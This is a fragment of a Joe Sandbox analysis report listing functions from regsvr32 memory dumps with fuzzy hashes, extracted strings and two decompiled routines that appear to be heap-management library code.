Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2|
API String ID: 0-4112153497
Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction ID: f0064799209d21e4fe13a692c1a0a3f3c04c77f3d90e03ead421c1f3c2ed964f
Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction Fuzzy Hash: 3731E2715083808FD768DF28C58A54BBBF1FBC6704F50891EE6CA8A260DB76D849CB03

Uniqueness

Uniqueness Score: -1.00%

Function 005E4E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

v)v, xrefs: 005E4F79

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: v)v
API String ID: 0-2248367734
Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction ID: e82676481311c11a9037bb82cbb35cf68d8737a5088e709294dd4b4750e75100
Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction Fuzzy Hash: B831FFB0D107199BDF88DFB8D98A4DDBBF0BB48308F50862DD816B6290D7785A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 005DA244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

b, xrefs: 005DA33B

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 005CD33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Y, xrefs: 005CD348

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005D0E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

0}, xrefs: 005D0EE2

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0}
API String ID: 0-2955618701
Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47

Uniqueness

Uniqueness Score: -1.00%

Function 005C98AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

6N, xrefs: 005C99AB

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6N
API String ID: 0-1503784733
Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 005D97CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

S}, xrefs: 005D98C4

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: S}
API String ID: 0-4277866985
Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 005DBDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

H-, xrefs: 005DBE4D

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H-
API String ID: 0-1037293833
Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 005D96D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

u*AR, xrefs: 005D978C

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u*AR
API String ID: 0-611844632
Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 005CDBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

g*`, xrefs: 005CDCA8

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g*`
API String ID: 0-1142845859
Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02

Uniqueness

Uniqueness Score: -1.00%

Function 005C92F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

5$, xrefs: 005C9317

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5$
API String ID: 0-3756733592
Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 005DA6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

n*=, xrefs: 005DA6F9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: n*=
API String ID: 0-1578461029
Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x18000a87c
0x18000a885
0x18000a893

APIs

GetProcessHeap.KERNEL32 ref: 000000018000A87C

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710

Uniqueness

Uniqueness Score: -1.00%

Function 005CB258 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction ID: d7f0f0737d2e2ef2d08726fcb51efa512e65952520fa5ae34dc5116e67f0a8ae
Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction Fuzzy Hash: 65E10570E0460ACFDF58DFA8C49A9AEBBB2FB44348F00455ED806E72A0D7749A15CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 005C1000 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction ID: 0205a8e0882d3cdd4d1a7500649af108fa7d785fcaf7cbdbb8ca5089883edfe7
Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction Fuzzy Hash: 69C1CEB9903609CFDB68CF38C49A59D3BF1AF64308F204119EC269A2A6D774D529CB48

Uniqueness

Uniqueness Score: -1.00%

Function 005D020C Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction ID: dadf676ce676a434c5e72dcc8667456334e5afbf1de5218782da33bcfdaf0e34
Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction Fuzzy Hash: B1B10870E04B489FDFA8DFA8D48A9DEBBF2FB44344F00451EE446A7290D7B8541ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 005CBA2C Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction ID: 2a950ccd55f545a8ab96916aacf307cd69aeb66ce43a54466139361c869756e6
Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction Fuzzy Hash: C8B1F5706087C88FDBBECF24C8896DA7BA9FB45708F50421DE9CA8E254DB749744CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005DD770 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction ID: 8c568867e48e880bef1a4d0ec5258a5269769bee840a84a506aaf9e6eeee1803
Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction Fuzzy Hash: 1E813A70D48709EFCB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A09CB81

Uniqueness

Uniqueness Score: -1.00%

Function 005E27EC Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction ID: 5eed51cbe9da93d31f5e090627527f57f41028f7f52490785ebf62b85c3c2dfd
Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction Fuzzy Hash: 808116B05107499BCF88CF28C8C99DD7FB1FB483A8FA56219FC4AA6254D774D885CB84

Uniqueness

Uniqueness Score: -1.00%

Function 005C3ABC Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction ID: 990909a1b6c3d42478c0bfa3fd3d7978bc0c266d8c71cfa35c8407f0bac3dad9
Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction Fuzzy Hash: 2E61307061464D8BDF28DF78D49A6AD3BE1FB44308F20613DEC669B2A2D774E906CB40

Uniqueness

Uniqueness Score: -1.00%

Function 005DE310 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction ID: 907c217c917ac0656aa253f2e6e462d63e5c96031018126002a0404ef6a9ea7e
Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction Fuzzy Hash: 86711770508789CBDBF9CF28C8896DE7BE4FB88704F20461DE9998B2A0DB749645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200

Uniqueness

Uniqueness Score: -1.00%

Function 005C2C78 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction ID: b7a71ebc6a6ca1b940a2af5d8bff0afe2065551e0a6c6c5b76293694432a04e4
Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction Fuzzy Hash: AD51F670518789CBDBBADF38C8996D97BB0FB58304F90861DD84E8E290DB78574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006818 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 56%

			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xfdf94ef470f2
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xfdf94ef470f2
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xfdf94ef470f2
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xfdf94ef470f2
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xfdf94ef470f2
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}

0x180006818
0x180006818
0x180006818
0x18000681d
0x180006822
0x180006830
0x180006835
0x180006838
0x18000683e
0x180006844
0x180006851
0x18000685a
0x180006864
0x180006868
0x18000686b
0x180006871
0x18000687f
0x180006889
0x18000688d
0x180006890
0x180006893
0x18000689a
0x18000689c
0x18000689c
0x1800068a6
0x1800068b0
0x1800068b8
0x1800068ba
0x1800068be
0x1800068ca
0x1800068d1
0x1800068d4
0x1800068dc
0x1800068e9
0x1800068ed
0x180006905
0x180006909
0x18000690c
0x180006914
0x180006917
0x18000691e
0x18000693d
0x180006943
0x180006946
0x180006959
0x180006962
0x180006968
0x180006979
0x180006982
0x180006986
0x180006992
0x18000699b
0x1800069a6
0x1800069aa
0x1800069c7

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300

Uniqueness

Uniqueness Score: -1.00%

Function 005CB83C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction ID: 12da0c7c0f3ac5b99734af93cafc228cafe7dfa3ece5bd8acbf199257ab971cd
Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction Fuzzy Hash: 3A5129719047498BDB48CF68C8895DEBFF1FB48318F11875CE89AA7260D7B89A44CF45

Uniqueness

Uniqueness Score: -1.00%

Function 005C90F8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction ID: 532e3ec3d3a16402de1156e3151a079d392738b4c3227e67a6b4347408f7c049
Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction Fuzzy Hash: CF51B2B090474E8FDB48CF68D49A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 005D5CC4 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
Instruction ID: 1321d5dcfb806502b435d3f44655615e03a06b6c970b0dd5511a8e4b923eb3f3
Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
Instruction Fuzzy Hash: 8F51A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 005E5450 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
